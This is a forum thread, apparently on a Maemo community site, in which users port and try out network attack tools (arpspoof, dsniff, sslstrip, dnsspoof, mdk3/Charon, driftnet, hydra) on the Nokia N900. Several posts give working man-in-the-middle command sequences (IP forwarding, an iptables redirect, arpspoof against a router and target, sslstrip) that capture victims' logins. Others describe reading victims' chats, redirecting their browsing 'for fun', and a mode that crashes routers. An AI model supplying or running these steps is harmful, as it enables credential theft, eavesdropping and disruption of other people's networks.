![]() |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
i tried using aircrack and it worked .. so i am asking what is the diffrence between this and aircrack ?
thanks in advance :) |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
don't forget to :
Code:
sudo gainroot@davdav this is completely something different from aircrack it's MITM same as ettercap but ultra faster |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
A quick test and all seems ok with the build .....
Code:
/arpspoof -i wlan0 -t 192.168.1.3 192.168.1.5 |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
cool
now i will go for charon and destruction mode ULTRA DANGEROUS but i will work on it tomorrow ;) arpspoof should be soon the new depend of yamas script :) |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
and what does that do ?
|
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
Its the same as ettercap but much better and faster
heres a link have a read see what you think ... http://en.wikipedia.org/wiki/ARP_spoofing Another good page |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
1 Attachment(s)
I try arpspoof and is starting.
Thank you karam and stevomanu |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
|
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
@ karam-- i did apt-get install yamas. then run the icon from the menu. then did as it said in the youtube video of yamas. then i could do it. passwords and login information and website also appeared. can you post a video of each of your hacking tutorials. arp spoofing coz its very hard for a noob to understand what you guys tok abt and also the wiki since i dnt hav any knowledge about linux. but i would love to test al this hacking materials. so please can you give a tutorial with a video or anythng. just for us (noobs). it would be helpful. i kno you are very busy with all your works. so i gues if u could appoint and of the gurus from the thread to just post tutorials. please karam.
|
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
omg omg omg omg
i'm so shy from u guys can some one upload karam.tar.gz to some where ?? i can't download it from mega nor any site uploaded to !! i need it for packaging libs from it to run arpspoof in repos ! |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip
sorry for the wait ... add link to first page if you like .. Quote:
|
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
TO KARAM:
i have talked with other people who has the N900 and MITM attacks no longer wornking in the N900, when you run ettercap or any other program who needs promiscuous mode, the conection get stuck and you can't sniff any packet or navigate with the N900. I have trying to reflash and nothing work, I use: kernel power 49 with CSSU testing but i have trying with kernel power 46, 47, 48 and nothing there is some packet or dependency or something thas has screw up the whole promiscuous mode in the N900. Do you have the same problem?? - Good news!! Recently the projetc ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus, it is a shame we don have this newer version compile for the N900, i have tried the new version in my desktop pc and runs great. - I have a question for you, are you developing for the N9 ?? because we still doesn't have in the N9 nothing of pentesting material, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit nothing. I will be great have someone of your expertice and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine. Karam thanks for the great work you are for sure one of the biggest experts in the community. |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
it's actually true that ettercap makes the connection horrible when using it on N900
that's why i have just finished uploading arpspoof (as package name dsniff) which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip) soon this problem will be solved for N900 as arpspoof will be the dependency of yamas and for N9 unfortunately i don't have one so till i get one (maybe will never) then i will port hacking tools to it PS: ettercap re alive is awesome will contact the author of the ettercap package to port it to N900 (it's very easy to do) |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS Code:
sudo gainrootCode:
apt-get install dsniff sslstrip iptablesthen CTRL+C then see the sslstrip.log you should see the pass and the username |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??
and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
yes that's true
and another yes it's possible with the same package i uploaded (dsniff) there is something called dnsspoof it does the job but i'll explain later because i don't have enough time now and i'm honored to be in this community too ;) PS : dsniff package has those sniffing tools: arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm ex : msgsnarf will allow you to sniff chat froma victim and urlsnarf will get you the urls of the victim and so on and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet puff many work to do short time i have but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333 arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1 sslstrip -l 333 No luck... I can not open no pages ( chrome, firefox) no internet ... ps try as well 8080 still no luck |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
Quote:
|
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
it worked with me
is arpspoof -i wlan0 -t router targer ? or only target router? q6600 maybe your computer is using a proxy |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
Quote:
How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience :D I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community. |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
Hi everyone ! Regarding yamas, please post in the appropriate thread so we can easily follow ;)
http://talk.maemo.org/showthread.php...as#post1156260 Btw, the new version with arpspoof is almost out ;) Unhuman could test it this morning. Oh, and it seems Karam is the one who ported arpspoof to maemo right ? Good job man ;) |
Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
@ All
sorry for taking so long to reply i'm so busy for about 3 months @-Tyler- i haven't yet but i will now and i think if you try the already compiled binaries the same ones of N900's it should work unless it has some library required so simply place the required ones @comaX :) already posted at yamas thread about driftnet and dnsspoof and urlsnarf check it ;) |
Re: [How To] Install Hacking Tools On N900
great news everyone
i have just finished building and uploading the following packages : mdk3 charon (mdk3 gui) driftnet cowpatty i have also updated dsniff to include dnsspoof.hosts file (was missing from the initial release) enjoy everyone ;) left to do : hamster, airdrop-ng |
Re: [How To] Install Hacking Tools On N900
Are thats a shame my nokia is getting fixed i hope , the usb post came out which im very gutted about back on my n97 for now how crap is that ...
great work thou as always |
Re: [How To] Install Hacking Tools On N900
icedtea is installed from the repo but i get
Nokia-N900:~# apt-get install -f charon Reading package lists... Done Building dependency tree Reading state information... Done Some packages could not be installed. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. The following information may help to resolve the situation: The following packages have unmet dependencies: charon: Depends: Icedtea6 but it is not installable E: Broken packages Nokia-N900:~# |
Re: [How To] Install Hacking Tools On N900
omg what a typo
it should be small i instead of big I this is the silliest typo i have ever mistaken with i will fix this now thank you for reporting this //EDIT: uploaded a fixed version of charon |
Re: [How To] Install Hacking Tools On N900
Hi Karam
I have the same error, i will later to install charon. |
Re: [How To] Install Hacking Tools On N900
charon runs fine but it is in french any chance to change it ?
:-) |
Re: [How To] Install Hacking Tools On N900
Now is working.
Same request like awett, plus the gui is so small i can not see much. best regards |
Re: [How To] Install Hacking Tools On N900
it seems there is another a typo in the latest set of 'security' tools in the repo: now in the binary "/opt/driftnet/drifnet". No 't' in the executable name :)
btw, should that one work fine ? I ran "/opt/driftnet/drifnet -v -i wlan0" but it seems it's only seeing the local traffic, not switching into promiscuous mode. Does one first need to do the iwconfig first to switch it to monitor mode? I though that was done in the driftnet program itself? PS. this is on my own network, I have the WPA2 key, I just wanna see how good it works:) The phone is runing power49. Running Charon is not always easy either, as it's crashing often. Thanks anyway for the effort. |
Re: [How To] Install Hacking Tools On N900
there must be a way to change it to english
however i can't do this my self as i have 0 expert with java things wish someone can do that instead of me and @q6600 so small ? it has every kind of usage of mdk3 the point of it is to run many attacks together like the destruction mode it leads to a crash of a router @Netweaver oops didn't see your post anyway you must run arpspoof before using driftnet to see others traffic and charon crashes are caused by icedtea6 as it's unstable |
Re: [How To] Install Hacking Tools On N900
@Karam
you miss understood me, i was referring to the fonts on the gui i can not see much. |
Re: [How To] Install Hacking Tools On N900
again
i say it is icedtea6 problem i run charon using j2me from easy debian it has full font and no crashes |
Re: [How To] Install Hacking Tools On N900
hmmm...
when i try to run charon from xterm it asks for a password....any hints? |
Re: [How To] Install Hacking Tools On N900
you are running it as root :)
run it as user because the launching script has : sudo |
Re: [How To] Install Hacking Tools On N900
Karam,
Nope, I am not running it as root and keeps asking for password. any other hints? |
Re: [How To] Install Hacking Tools On N900
karam,thank you port these great hack tool to N900,
very like. if you have free time, can you port THC-hydra7.2 to N900, i think it will welcome http://www.thc.org/thc-hydra/ have other question,i installed metasploit on N900, but how let in support db command, i try execute :gem1.8 install mysql , but failed |
Re: [How To] Install Hacking Tools On N900
hydra is already ported
check the first post attachements and about db support you will need to have gcc and other tools to compile not sure : but there is an app called tinygcc or somthing (development section) however i don't recommend using this on N900 i have tried it once veeeeeeeery slow plus if any crash happened the whole of /home partition is corrupted it will lead to a reflash @gorgezilla as root : java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar as user : /usr/bin/charon the shortcut works fine right ? |
Re: [How To] Install Hacking Tools On N900
kararm, i know ,but the latest hydra version is 7.2,
fix a lot bug , speen-up,add some services to support. thanks ,i will install gcc to try it , thank your hard work. |
Re: [How To] Install Hacking Tools On N900
why do i get 'permission denied' when i run mdk3 or charon even when i'm root.
|
| All times are GMT. The time now is 20:06. |
vBulletin® Version 3.8.8